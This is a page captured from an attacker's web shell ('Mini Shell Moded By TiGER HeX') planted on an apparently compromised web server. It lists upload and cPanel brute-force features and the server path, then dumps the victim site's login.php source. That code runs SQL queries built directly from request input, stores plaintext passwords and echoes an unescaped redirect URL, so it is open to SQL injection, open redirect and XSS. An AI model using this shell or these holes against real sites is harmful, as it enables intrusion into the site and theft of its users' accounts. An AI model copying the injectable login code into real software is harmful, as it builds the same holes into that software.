Mini Shell Moded By TiGER HeX
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
var
/
www
/
ridazz
/
Linux midnightridazz 4.19.0-11-cloud-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
Upload File :
New :
File
Dir
//var/www/ridazz/xxxlogin.php
<?php include_once('includes/static/configure.php'); include_once('includes/static/util.php'); include_once('includes/static/dbcon.php'); include_once('includes/static/sessions.php'); include_once('includes/appTop.php'); $append_uid = 0; if(isset($_REQUEST['appendUserId'])){ $append_uid = $_REQUEST['appendUserId']; } //this is called from the email to activate the count if(isset($_REQUEST['id'])){ $query = base64_decode($_REQUEST['id']);//passed in are username,user_id, and refurl parse_str($query); $sql = "UPDATE 50mm_users SET verified = 1 WHERE user_id = '$uid' AND username = '$uname'"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } $html = "You have successfully verified your email address. You will need to login in below."; }else{ $sql = "SELECT page_body FROM 50mm_pages WHERE page_name ='login'"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } $row = $db->sql_fetchrow($result); $html = stripslashes($row['page_body']); if(isset($_REQUEST['refurl'])){ $refurl = urldecode($_REQUEST['refurl']); if(preg_match("/logout.php/i",$refurl)){ $refurl = "/"; } }else{ $refurl = "/"; } } if(isset($_REQUEST['login'])){ $uname = $_REQUEST['usernameLogin']; $password = $_REQUEST['passwordLogin']; $sql = "SELECT user_id,username,banned FROM 50mm_users WHERE username ='$uname' AND password = '$password' AND verified = 1"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } if($db->sql_numrows($result) > 0){ $row = $db->sql_fetchrow($result); if($row['banned']){ header("Location: banned.php"); exit(); }else{ //we've authenticated so set the session id $_SESSION['user_id']=$row['user_id']; $_SESSION['username'] = $row['username']; $sess_id = session_id(); $expires = time() + SESS_LIFE; $sql = "SELECT COUNT(*) AS total FROM 50mm_online WHERE session_id = '$sess_id'"; if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } $row = $db->sql_fetchrow($result); if($row['total'] > 0){ $sql = "UPDATE 50mm_online SET expires = '$expires',user_id = '".$_SESSION['user_id']."',username = '".$_SESSION['username']."' WHERE session_id='$sess_id'"; }else{ $sql = "INSERT INTO 50mm_online (session_id,user_id,username,expires) VALUES ('$sess_id','".$_SESSION['user_id']."','".$_SESSION['username']."','$expires')"; } if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); } //append the session id to the url. This is used for pages that need to redirect to a user specific page. ie profile page if($append_uid==1){ $refurl = append_query($refurl,"userId",$_SESSION['user_id']); } header("Location: $refurl"); exit(); } }else{ session_destroy(); $url = append_query($_SERVER['PHP_SELF'],"errorCode",1); $url = append_query($url,"refurl",$refurl); header("Location: $url"); exit(); } } $pg_name = basename($_SERVER['PHP_SELF']); include_once('includes/header.php'); $err = ""; if(isset($_REQUEST['errorCode'])){ $errorCode = $_REQUEST['errorCode']; if($errorCode == 1){ $err ="<div class=\"error\">The password or username you have provided DO NOT match<br><BR> OR your account has not been verified yet.</div>"; } } echo $html; ?> <br> <script>divs = new Array('usernameLogin','passwordLogin');</script> <form id="login" action="<?echo $_SERVER['PHP_SELF']?>" method="post" enctype="multipart/form-data" onSubmit="return validateForm(this,divs,'loginError');"> <table border="0" cellpadding="4" cellspacing="0"> <tr> <td width="*"> </td> <td colspan="2"><div id="loginError" class="error" style="visibility:hidden;">Please correct the fields marked by *</div></td> </tr> <tr> <td width="*">Username<span id="errusernameLogin" class="error" style="visibility:hidden;"> *</span></td> <td colspan="2"><input type="text" name="usernameLogin" value="" class="field"></td> </tr> <tr> <td>Password<span id="errpasswordLogin" class="error" style="visibility:hidden;"> *</span></td> <td colspan="2"><input type="password" name="passwordLogin" value="" class="field"></td> </tr> <tr> <td> </td> <td width="*"> <input name="login" type="submit" class="button" value="Login"> </td> <td style="padding-right:20px;"><a href="registerx9849822.php?refurl=<?echo $refurl?>">Register</a> | <a href="forgotPassword.php">Forgot your password?</a></td><br><br> </tr></form> <tr> <td colspan="3">Having fun out there? Please consider becoming a supporter by subscribing. <br> All funds will be used for hosting and improvements to the website.<br> <form action="https://www.paypal.com/cgi-bin/webscr" method="post"> <input type="hidden" name="cmd" value="_s-xclick"> <input type="hidden" name="hosted_button_id" value="XQLJLU2XWW65N"> <table> <tr> <td><input type="hidden" name="on0" value="Choose your level of support">Choose your level of support</td> </tr> <tr> <td><select name="os0"> <option value="Lil Skull">Lil Skull : $5.00USD - monthly</option> <option value="Big Skull (Free MR patch included)">Big Skull (Free MR patch included) : $50.00USD - yearly</option> <option value="Ride or Die (Free MR patch and shirt included)">Ride or Die (Free MR patch and shirt included) : $75.00USD - yearly</option> </select></td> </tr> </table> <input type="hidden" name="currency_code" value="USD"> <input type="image" src="https://www.paypal.com/en_US/i/btn/btn_subscribeCC_LG.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!"> <img alt="" border="0" src="https://www.paypal.com/en_US/i/scr/pixel.gif" width="1" height="1"> </form> <br> <br> </td> </tr> </table> <br> <?echo $err?> <input name="refurl" value="<?echo $refurl?>" type="hidden"> <input name="appendUserId" value="<?echo $append_uid?>" type="hidden"> </form><BR><BR><BR><BR><BR> <? include_once('includes/onlineUsers.php'); include_once('includes/footer.php'); include_once('includes/appBottom.php'); ?>